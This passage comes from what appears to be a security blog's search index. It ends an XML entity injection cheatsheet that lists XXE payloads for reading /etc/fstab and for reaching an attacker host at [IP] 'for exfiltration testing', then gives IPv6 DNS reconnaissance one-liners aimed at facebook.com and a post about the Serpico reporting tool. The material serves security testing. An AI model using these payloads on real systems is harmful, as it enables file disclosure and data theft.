xmlns:xi=\u0026#34;http://www.w3.org/2001/XInclude\u0026#34;\u0026gt; \u0026lt;xi:include href=\u0026#34;file:///etc/fstab\u0026#34; parse=\u0026#34;text\u0026#34;/\u0026gt; URL handler. This follows XML Entity - IBM I have not seen this work ā€œin the wildā€. Should be useful for exfiltration testing:\n1 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY c PUBLIC \u0026#34;-//W3C//TEXT copyright//EN\u0026#34; \u0026#34;http://[IP]/copyright.xml\u0026#34;\u0026gt;]\u0026gt; XML Schema Inline:\n1 2 \u0026lt;madeuptag xlmns=\u0026#34;http://[ip]\u0026#34; xsi:schemaLocation=\u0026#34;http://[IP]\u0026#34;\u0026gt; \u0026lt;/madeuptag\u0026gt; Remote XML Schema. Also, have not been able to get this to work:\n1 \u0026lt;!DOCTYPE root PUBLIC \u0026#34;abc/Catalog\u0026#34; \u0026#34;http://[IP]/catalog.dtd\u0026#34;\u0026gt; Useful Links:\nXML Entity Examples - IBM XML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques OWASP Testing for XML Entity Injection ","date":"2014-09-03T00:00:00Z","image":"/images/2022/11/monster4.png","permalink":"/xml-entity-cheatsheet/","title":"XML Entity Cheatsheet"},{"content":"A hostname with an IPv6 address is stored as a AAAA resource record in DNS (see AAAA record). There are many DNS hostname bruteforcing tools, personally I like Fierce. Suppose we have already run our hostname bruteforcing tool against a target domain (e.g. facebook.com). Below we use dig to do a AAAA record lookup for each hostname. Note, the DNS server we use matters. In this example we use 8.8.8.8, to confirm different results try using a.ns.facebook.com instead. Host can also be used instead of dig:\n1 2 3 4 5 6 7 8 $\u0026gt; cat fb_hosts.txt | while read line; do echo $line\u0026#34; Results:\u0026#34; \u0026amp;\u0026amp; dig @8.8.8.8 +noall +answer AAAA $line \u0026amp;\u0026amp; echo; done mobile.facebook.com Results: ipv6.facebook.com Results: www.facebook.com Results: www.facebook.com. 1903 IN CNAME star.c10r.facebook.com. star.c10r.facebook.com. 30 IN AAAA 2a03:2880:f00b:900:face:b00c:0:1 An offline/quieter way is to use the DNS Record (ANY) set from the Internet-Wide Scan Data Repository done by Rapid7. Using facebook.com as an example again:\n1 $\u0026gt; pigz -dc 20140310_dnsrecords.gz | grep -i \u0026#34;\\.facebook\\.com\u0026#34; | grep AAAA This didnā€™t turn up very many results but we can combine the two:\n1 2 3 4 5 $\u0026gt; pigz -dc 20140310_dnsrecords.gz | zgrep \u0026#34;\\.facebook\\.com\u0026#34; | grep \u0026#34;,A,\u0026#34; | cut -d\u0026#34;,\u0026#34; -f1 | while read line; do echo $line\u0026#34; Results:\u0026#34; \u0026amp;\u0026amp; dig @8.8.8.8 +noall +answer AAAA $line \u0026amp;\u0026amp; echo; done ... z.c10r.facebook.com Results: z.c10r.facebook.com. 59 IN AAAA 2a03:2880:f00b:305:face:b00c:0:1 ... You get the idea =). Not a new concept or technique, just wanted to put some notes in one place.\n","date":"2014-08-19T00:00:00Z","image":"/images/2022/11/robot3.png","permalink":"/ipv6-dns-guessing-notes/","title":"IPv6 DNS Guessing Notes"},{"content":"Last week at Blackhat Arsenal 2014, Pete and I (@will_is) presented on Serpico. Arsenal was a great experience and I would highly recommend to anyone as an attendee or presenter. We got some great feedback on the project, so thank you to anyone who stopped by.\nHere were the top 3 feature requests and their associated issue on github:\nGlobal Variables This feature would allow a user to add their own variable in the UI that would render in the template. A classic use case would be to edit the Executive Summary through the UI rather than inside of a template.\nGithub Issue: Support ā€œGlobal Variablesā€ for reports Released 08/22\nMore Findings As of the most recent build Serpico comes with 8 findings; this is an area of active development. More than one person asked for findings from open sources such as CWE.\nGithub Issue: Include 40 Findings with the default installation\nPlugin to 3rd Parties This feature would allow a user to parse findings from different vulnerability scanners and import the results.\nGithub Issue: Support a connector to Nessus\n","date":"2014-08-11T00:00:00Z","image":"/images/2022/11/falcon3-1.png","permalink":"/untitled/","title":"Blackhat 2014 Arsenal Experience"}]